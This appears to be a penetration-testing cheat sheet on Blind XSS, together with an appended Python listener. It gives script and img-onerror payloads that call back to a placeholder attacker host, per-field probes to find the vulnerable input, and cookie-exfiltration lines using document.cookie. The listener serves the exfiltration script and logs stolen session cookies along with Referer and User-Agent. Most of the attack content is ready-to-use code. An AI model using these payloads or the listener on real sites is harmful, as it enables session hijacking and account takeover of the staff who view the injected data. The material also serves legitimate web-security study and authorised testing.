PRIMARY CATEGORY → XSS

Theory

A Blind XSS is one where we can neither see our input reflected in the body of the HTTP response (as with Reflected or Stored XSS) nor watch it modify the current DOM via JavaScript (as with DOM-based XSS): the payload is triggered on a page we do not have access to, typically an internal back office or admin panel where the stored data is later displayed

It usually occurs on contact forms, product reviews, user details, support tickets and similar inputs that are stored and later viewed by staff

Since we cannot see how our input (i.e. the payload) is displayed in the HTTP response, we use a JavaScript payload that makes the victim's browser send an HTTP request back to a server we control

JS Payload

<script src="http://<ATTACKER_IP>:<PORT>"></script>

HTTP Server

python3 -m http.server 80

If a request reaches our HTTP server, the endpoint where the data is sent is vulnerable. Two caveats: the request may arrive minutes, hours or even days later, when a member of staff actually opens the page, so the listener has to stay up; and the Referer and User-Agent headers of the hit are worth recording, since they reveal the hidden page where the payload fired and whether a real browser (rather than an automated link checker) made the request

If so, we can replace the previous payload with one that loads a JavaScript file hosted on our server. Note that if the page where the payload fires is served over HTTPS, modern browsers block a script loaded over plain HTTP as mixed content, so in that case the listener must serve HTTPS as well

<script src="http://<ATTACKER_IP>:<PORT>/<JS_SCRIPT>"></script>
// OR
<img src=x onerror="var s=document.createElement('script'); s.src='http://<ATTACKER_IP>:<PORT>/<JS_SCRIPT>'; document.body.appendChild(s);">

The drawback of this approach is that we may have to try several payloads until we find one that fits the injection context. For that, we have the following list of payloads

PayloadAllTheThings

Since we do not know the context in which our input is rendered, probing with several payload variants that all call back to our server is a good way to assess a possible injection point

Another drawback: if the form we are facing is periodically reviewed by an agent or administrator, we will not know which of the fields is vulnerable, at least if we enter the same payload in all of them

However, we can send a different payload in each field. Every payload requests a resource hosted on our HTTP server, and the name of that resource is the name of the field it was injected into

For instance, suppose a contact form with three fields, namely username, email and subject

We can send the following payloads

<script src="http://<ATTACKER_IP>:<PORT>/username"></script>
<script src="http://<ATTACKER_IP>:<PORT>/email"></script>
<script src="http://<ATTACKER_IP>:<PORT>/subject"></script>

If we receive a request for any of these resources, its path tells us which field is vulnerable

Otherwise, we have to try again with a different type of payload, such as those mentioned previously, since the field may be vulnerable in a context where a bare <script> tag does not execute (e.g. inside an HTML attribute)


Abuse

Session Hijacking

As is well known, the vast majority of web applications manage user sessions with cookies

This means that users do not have to log in to the web application every time they open their browser

However, it also means that an attacker who steals the session cookie can impersonate the user and take over the entire account, which is known as session hijacking

So, once we have detected the vulnerable endpoint, we can proceed to the XSS exploitation and, from there, to the session hijacking

We have several JavaScript payloads to exfiltrate the session cookie by sending it to our HTTP server

document.location = 'http://<ATTACKER_IP>:<PORT>/index.php?c=' + document.cookie
new Image().src = "http://<ATTACKER_IP>:<PORT>/index.php?c=" + document.cookie

The first payload redirects the victim's browser to our server, which the agent will notice, whereas the Image variant fires silently in the background. Also, document.cookie only exposes cookies set without the HttpOnly flag; if the session cookie has it, we will receive an empty value and the cookie cannot be stolen this way. The steps to complete the attack are the following

Setting up an HTTP Server
python3 -m http.server <PORT>
Writing the JS Payload to a hosted file

e.g. script.js

new Image().src = "http://<ATTACKER_IP>:<PORT>/index.php?c=" + document.cookie
Sending the XSS Payload
<script src="http://<ATTACKER_IP>:<PORT>/script.js"></script>
// OR
<img src=x onerror="var s=document.createElement('script'); s.src='http://<ATTACKER_IP>:<PORT>/script.js'; document.body.appendChild(s);">
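The following listener, added here as a worked example and not part of the original notes, puts both halves of the procedure together: it prints the per-field probes from the detection section, serves the cookie-exfiltration script as /script.js and logs each callback as a JSON line with the field name, the decoded cookie, the Referer and the User-Agent. The function and file names (make_probe_payloads, parse_hit, describe_hit, listener.py) are assumptions, and the addresses are placeholders. It goes slightly beyond the payload on the page: the served script wraps document.cookie in encodeURIComponent so that ';' and '=' survive the round trip, and an empty c= value is kept and reported, which is how an HttpOnly session cookie shows up on our side. The Referer may be absent or reduced to an origin depending on the victim page's referrer policy.

```python
# Added example (not from the original notes): a Blind XSS listener that
# serves the cookie-exfiltration script as /script.js and logs every other
# request as a JSON record with field name, cookie, Referer and User-Agent.
import json
import sys
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlsplit

# Exfiltration payload served as /script.js. {cb} becomes the listener's own
# URL; encodeURIComponent keeps ';' and '=' in the cookie string from being
# mangled when the value is parsed back on our side.
EXFIL_JS = 'new Image().src = "{cb}/index.php?c=" + encodeURIComponent(document.cookie);'


def make_probe_payloads(fields, base_url):
    """One <script> probe per form field; each fetches /<field>, so the path of
    the callback that arrives names the field rendered without encoding."""
    base = base_url.rstrip("/")
    return {f: f'<script src="{base}/{f}"></script>' for f in fields}


def parse_hit(target):
    """Map a callback's request target to (field, cookie).

    /username             -> ("username", None)   probe hit, no cookie involved
    /index.php?c=sid%3D1  -> ("index.php", "sid=1")  exfiltration hit
    /index.php?c=         -> ("index.php", "")  script ran but document.cookie
                             was empty, i.e. the session cookie is HttpOnly
    """
    parts = urlsplit(target)
    field = parts.path.strip("/") or "(root)"
    cookie = parse_qs(parts.query, keep_blank_values=True).get("c", [None])[0]
    return field, cookie


def describe_hit(target, remote_addr, headers):
    """Build the log record. Referer reveals the hidden page where the payload
    fired; User-Agent tells a real browser from an automated link checker."""
    field, cookie = parse_hit(target)
    return {
        "time": time.strftime("%Y-%m-%dT%H:%M:%S"),
        "src": remote_addr,
        "field": field,
        "cookie": cookie,
        "referer": headers.get("Referer"),
        "user_agent": headers.get("User-Agent"),
    }


class Listener(BaseHTTPRequestHandler):
    callback_url = "http://127.0.0.1:8000"  # replaced in main() with the real host:port

    def do_GET(self):
        if self.path == "/script.js":
            body = EXFIL_JS.format(cb=self.callback_url).encode()
        else:
            record = describe_hit(self.path, self.client_address[0], self.headers)
            print(json.dumps(record), flush=True)
            body = b""  # empty but valid JS, so a <script> probe leaves no console error
        self.send_response(200)
        self.send_header("Content-Type", "application/javascript")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):
        pass  # the JSON line above replaces the default access log


def main(argv):
    # usage: python3 listener.py <ATTACKER_IP> <PORT>
    if len(argv) != 3:
        sys.exit("usage: listener.py <ATTACKER_IP> <PORT>")
    host, port = argv[1], int(argv[2])
    Listener.callback_url = f"http://{host}:{port}"
    # Print the probes to paste into the form, one per field.
    for field, payload in make_probe_payloads(["username", "email", "subject"], Listener.callback_url).items():
        print(f"[probe] {field}: {payload}")
    ThreadingHTTPServer(("0.0.0.0", port), Listener).serve_forever()


if __name__ == "__main__":
    main(sys.argv)
```

Run it as python3 listener.py <ATTACKER_IP> <PORT>, paste the printed probes into the form fields, and watch stdout: a hit on /email identifies the field, a hit on /index.php with a non-empty c= value is the session cookie, and a hit with c= empty means the script executed but every cookie on the page is HttpOnly.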